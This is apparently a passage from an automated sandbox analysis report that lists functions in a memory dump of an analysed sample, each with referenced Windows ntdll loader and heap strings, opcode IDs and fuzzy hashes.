                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                • Instruction ID: 833523bc7534be3764203cd2499ee8dcceea8add612d9892285eaf6778609081
                                                • Opcode Fuzzy Hash: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                • Instruction Fuzzy Hash: 9471DE74A006059FDB2DDFA8D988ABEBBF4FF88608F55406DE802A7255E734AD41CB41
                                                Function 01190A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                • Instruction ID: a8a64fef1e46d6b4c44e16f888cab617dce1ae40a9fb23cd486e93f1f7267977
                                                • Opcode Fuzzy Hash: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                • Instruction Fuzzy Hash: 3B61DD74604701DFDB6DCF28C484B6ABBF6FF49708F14855AE46A8B282D774E881CB91
                                                Function 011BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011F82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 011F82D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 011F82DE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                • Instruction ID: 68492e8fb42012121c014f56b2a556b8f62c61e8d6320d60a267150769969b89
                                                • Opcode Fuzzy Hash: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                • Instruction Fuzzy Hash: ED412375654701ABDB29EB68EC88F9B77E8FF44654F00492AF958D3260E774E800CBD2
                                                Function 0123C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • PreferredUILanguages, xrefs: 0123C212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0123C1C5
                                                • @, xrefs: 0123C1F1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                • Instruction ID: 817163a943069fafa1bdcc969e133aef85bb68bbd98b3e48533dc4e23f770fdd
                                                • Opcode Fuzzy Hash: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                • Instruction Fuzzy Hash: 714188B1E1021AEBDF15DBD8C841FEEBBB8AB54704F04406BEA05F7240D7749A54CB50
                                                Function 01214144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                • Instruction ID: d3b9a7f8b0fae6b8fe8e33c8a857a1fa6f887ece961212613287fa4807020644
                                                • Opcode Fuzzy Hash: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                • Instruction Fuzzy Hash: AA4137319202998BEB26EFE8C844BECBBF4FF65344F24045ADA15EB785D7748941CB50
                                                Function 01204755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01204899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01204888
                                                • LdrpCheckRedirection, xrefs: 0120488F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                • Instruction ID: bcaa9145c50f7bee2a6292d0d9a30b8d1fda5ab39b806896a909076bb6c2090e
                                                • Opcode Fuzzy Hash: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                • Instruction Fuzzy Hash: 3541D632A246928FDB27EE18D841A277BE4EF89650B05875DEF44972A3D330D900CB81
                                                Function 01190BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                • Instruction ID: 89a905a982cd38490cbcaf836d3d3d970e73142feb94e315fe150baa1bf3f33f
                                                • Opcode Fuzzy Hash: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                • Instruction Fuzzy Hash: 3511E135314502DFDBADDA18C858B76B7EAEF44619F19811DF426CB251EB30D840C756
                                                Function 012020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01202104
                                                • LdrpInitializationFailure, xrefs: 012020FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 012020F3
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                • Instruction ID: 8f849098f9232bf2b8dd32b789b5dea56b944182784586a996131a69bc9977be
                                                • Opcode Fuzzy Hash: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                • Instruction Fuzzy Hash: 4AF02834650309FFE728E60CDC0AF96B76CEB80B44F100019F700772C6D3B0A510CA81
                                                Function 011903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                • Instruction ID: 90af4c9ff4a4605330c999c1db9f21a4b949978a13fd9d315590410ab7e5f412
                                                • Opcode Fuzzy Hash: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                • Instruction Fuzzy Hash: 41716871A0054A9FDF09DFA8C994BAEB7F8BF18744F154069E910E7251EB34EE01CBA0
                                                Function 0118A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Exit, xrefs: 0118AA25
                                                • LdrResSearchResource Enter, xrefs: 0118AA13
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                • Instruction ID: 3f57aab0e050e5b76c55007acd758ddea7a37ea53b4976a385ea722482cb4c3d
                                                • Opcode Fuzzy Hash: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                • Instruction Fuzzy Hash: 69E19E71A00619AFEB2EDFD8D994BAEBBB9BF04310F15842AE911E7241E734D940CF51
                                                Function 0124A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 750a3aaf8b7aba02703573b67bb1f2ca9efa7a8e226da7f7eb40aaddaf0fab61
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: D6C1C1312643429FEB29CF28C841B6BBBE5EFD4718F084A2DF6968B291D774D505CB81
                                                Function 011FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                • Instruction ID: b41beb10240b5be1825a6150513c41330f92b6e7adf972c565bed64952db458c
                                                • Opcode Fuzzy Hash: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                • Instruction Fuzzy Hash: C9616C72E017199FDB29DFA8C850BAEBBB9FB44704F15412DE649EB261D731E900CB50
                                                Function 012243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
                                                • Instruction ID: 7bdf8486b1bb79785d4fb68244c852d443d5eda3b813266caa375afa44e65522
                                                • Opcode Fuzzy Hash: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
                                                • Instruction Fuzzy Hash: 0C512971D1066EAFDF15EFA9CC80AEEBBB8EB54758F100529E611B7290D7309A05CB60
                                                Function 011804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0118063D
                                                • kLsE, xrefs: 01180540
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: b05844e74a5efaf3f6164d0a2f47d75de951ff71f618ae3479a41d651d9ab848
                                                • Instruction ID: 5b45f1418589d341c7ab7182b9bd4c7c674dfd568cff3ef6be09d57ab6353c64
                                                • Opcode Fuzzy Hash: b05844e74a5efaf3f6164d0a2f47d75de951ff71f618ae3479a41d651d9ab848
                                                • Instruction Fuzzy Hash: 8951B37150474A8FD728EF28C4446A7B7E4AF89308F24883DF9A987241E770D549CFA2
                                                Function 0118A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0118A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0118A309
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 88ec7e765217d4a03e1f708620e98e62e746ffbf5466bd0c92efbb8456925d26
                                                • Instruction ID: 55b2471fa294a757834c32020b7f7ddc6493815ed4e78baa2f6cc35fc1c63095
                                                • Opcode Fuzzy Hash: 88ec7e765217d4a03e1f708620e98e62e746ffbf5466bd0c92efbb8456925d26
                                                • Instruction Fuzzy Hash: E241BE30A08A49CBDB29DFA9D454B6D7BF4FF84304F2480AAED10DB291E375D900CB41
                                                Function 011BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 26d229a0c0b709169173a68104047a3a449245acff1e82e9a57b4d33d4792046
                                                • Instruction ID: 4e372062762f28c1e1ffbab4f6b9366b496e8b6843ad9d240a771ed8b2df9829
                                                • Opcode Fuzzy Hash: 26d229a0c0b709169173a68104047a3a449245acff1e82e9a57b4d33d4792046
                                                • Instruction Fuzzy Hash: 3C0121B2200700AFE315DF14DD89F667BE8EB90B19F008839E618C7190E738E804CB46
                                                Function 0118C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: 95a8012c9106aa7bc450b85502003152ddb2b336881914bbcd52c2ec4d3ec935
                                                • Instruction ID: f94a1ae593897a8491db7653ee53003cb584507224349993355578b3e6273fbe
                                                • Opcode Fuzzy Hash: 95a8012c9106aa7bc450b85502003152ddb2b336881914bbcd52c2ec4d3ec935
                                                • Instruction Fuzzy Hash: F0825C75E003198BEF29EFA9D880BEDBBB1BF44350F14C169E919AB291D7309941CF91
                                                Function 01206420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 9ef6eb127e47358391ad0c6417c9f97701ff5ff9e319ba1eb566a0ebd8d080fe
                                                • Instruction ID: 2f19729b90d4a8579d8a7e0758933c1ecb840a5c9f68590af6b6ca7f035a8d93
                                                • Opcode Fuzzy Hash: 9ef6eb127e47358391ad0c6417c9f97701ff5ff9e319ba1eb566a0ebd8d080fe
                                                • Instruction Fuzzy Hash: 7291917195061AAFEB26DF95CC85FAEBBB8EF14B54F100125F600AB1D1D775AD00CBA0
                                                Function 0122E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 7e7f244b1acf78c5ec5d9c15deb76c8056e14ef248c3238c316840be887aacfc
                                                • Instruction ID: 6e385a54604a51b990a7010d6641c4f8eb816a87196c695b817036919ad1cb7d
                                                • Opcode Fuzzy Hash: 7e7f244b1acf78c5ec5d9c15deb76c8056e14ef248c3238c316840be887aacfc
                                                • Instruction Fuzzy Hash: 7C91FE3192061ABEDF26EBA4CC80FEFBB79EF55744F110029F615A7250DB749901DB90
                                                Function 011BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: fccc8a8d4e54f3c785a9c5d7b84cb97502c07885da7915eaacae0831d9b37126
                                                • Instruction ID: b8a64cfd32e34100ab666c5efbf6e62fb68e1d13ff10720b90704ff079b24857
                                                • Opcode Fuzzy Hash: fccc8a8d4e54f3c785a9c5d7b84cb97502c07885da7915eaacae0831d9b37126
                                                • Instruction Fuzzy Hash: 2F717BB5E0071A9FDF2CCF98D5906EDBBB2BF48710F14812EEA06A7245E7319841CB50
                                                Function 01224978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 9e0882fd8a7a5f4f2a7cb03413e0a67380d8f9ef30c8673a58a638cd1907e6f5
                                                • Instruction ID: c86a82c27694b740a66beb89d442fe464da42e3628fb88d6c3e6f489f85997a2
                                                • Opcode Fuzzy Hash: 9e0882fd8a7a5f4f2a7cb03413e0a67380d8f9ef30c8673a58a638cd1907e6f5
                                                • Instruction Fuzzy Hash: 3351A572D2027AEBDF15EF99D840BAEBBB4BF14A14F054129EA15BB250D3749C01CBA4
                                                Function 0119E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: e40042e0fa29a97cd1a655c725bbf2fe97a89c71ed245f299ceda63d2882f919
                                                • Instruction ID: 51ae2ece1dbe7d2784f7321fea86c373e0d5489146d75d1b751cd963b91174af
                                                • Opcode Fuzzy Hash: e40042e0fa29a97cd1a655c725bbf2fe97a89c71ed245f299ceda63d2882f919
                                                • Instruction Fuzzy Hash: 4641927150A742ABDB1DDA75C880B6FBBE8AF88618F44092DF5A4D7140E774D904C7D3
                                                Function 011FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 4d77bb34eb1039555258d12a380bb935a1b27c998e9fee5d8e70d7d4ed4212a6
                                                • Instruction ID: 74a13e5afd9835db14d7424df790d3a362ad2f48a385c8ad8e3531234ca0b332
                                                • Opcode Fuzzy Hash: 4d77bb34eb1039555258d12a380bb935a1b27c998e9fee5d8e70d7d4ed4212a6
                                                • Instruction Fuzzy Hash: A84133B1D0052DABDB25DA50CC84FDEB77CAB54718F0045E9EB08AB140DB709E899FE4
                                                Function 01216B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 6d12e9fd375e711b9118fab75777ac1967aed2bedd1937b36ab788203239375a
                                                • Instruction ID: 7cea2313876897318408ab50d674fe506d5743b4ba8d6e8dc74618c8682297d6
                                                • Opcode Fuzzy Hash: 6d12e9fd375e711b9118fab75777ac1967aed2bedd1937b36ab788203239375a
                                                • Instruction Fuzzy Hash: 00312C31A1071A9BEB22CF69C858BEE7BF8DF24704F14402CEA50AB281D7B5D905CB50
                                                Function 011FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 0114a5fe8d50548a0af919cbc1e275bdfe10fcef858748e912c80b18b26f4eb0
                                                • Instruction ID: 9e9e97c52c5fd2300976b48798c588c13b4192a9189f4ad5484c759d641dc2fa
                                                • Opcode Fuzzy Hash: 0114a5fe8d50548a0af919cbc1e275bdfe10fcef858748e912c80b18b26f4eb0
                                                • Instruction Fuzzy Hash: 3331053A90051DAFEB1EDB59C845FAFBB74EB80790F01412DAA15A7250D7309E04EBE0
                                                Function 0120892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0120895E
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: fbbff216882803c968cad67122a455ef3a2326b80446d6e68b421ef76bd70d0a
                                                • Instruction ID: bdf7482d1ef71025a95077e9fa4f8efad5f3dadf7cb2bf55f8226ac728b9c50d
                                                • Opcode Fuzzy Hash: fbbff216882803c968cad67122a455ef3a2326b80446d6e68b421ef76bd70d0a
                                                • Instruction Fuzzy Hash: 7701F73273020A9BEB267B599C84A6BBB65EF85254B05021CF74116693CB706C81C792
                                                Function 01222000 Relevance: .8, Instructions: 757COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c07e955139bd8c9a5cd8f36e7628ab09709e68947b5952ba92b4900eac502930
                                                • Instruction ID: 017fd8a2ab86df339b6f5024b899701c818dad725df11bbb07e76a18ee7a5dc7
                                                • Opcode Fuzzy Hash: c07e955139bd8c9a5cd8f36e7628ab09709e68947b5952ba92b4900eac502930
                                                • Instruction Fuzzy Hash: DC42D331628352EBD725CF68C880A6FBBE5EF98304F58092DFB8297250D772D945CB52
                                                Function 01218158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af75bb40dd47bdaff1e4cb7bc1c78ccf53b7533e489264e0065756a12bcf1784
                                                • Instruction ID: 49e3d8881c532ba57f3163c1c1dd5b7b629b26ed1b239b99e222eb11f3c8a0f1
                                                • Opcode Fuzzy Hash: af75bb40dd47bdaff1e4cb7bc1c78ccf53b7533e489264e0065756a12bcf1784
                                                • Instruction Fuzzy Hash: 6C427D75E102198FEB25CF69C881BADBBF5FF58300F198099EA49EB245DB349981CF50
                                                Function 01192840 Relevance: .6, Instructions: 605COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db3f665fccac5ef982a26fb1485f0b935e8872fc9005a5f5d738360e86149150
                                                • Instruction ID: f105e3db5ea4e888895d8bcabead5677178154190d74ae3ec35975333d0f3ffa
                                                • Opcode Fuzzy Hash: db3f665fccac5ef982a26fb1485f0b935e8872fc9005a5f5d738360e86149150
                                                • Instruction Fuzzy Hash: A132EF70A00B559FEB2CCFA9C848BBEBBF2BFA4704F54411DD4969B285E735A801CB51
                                                Function 0122A118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
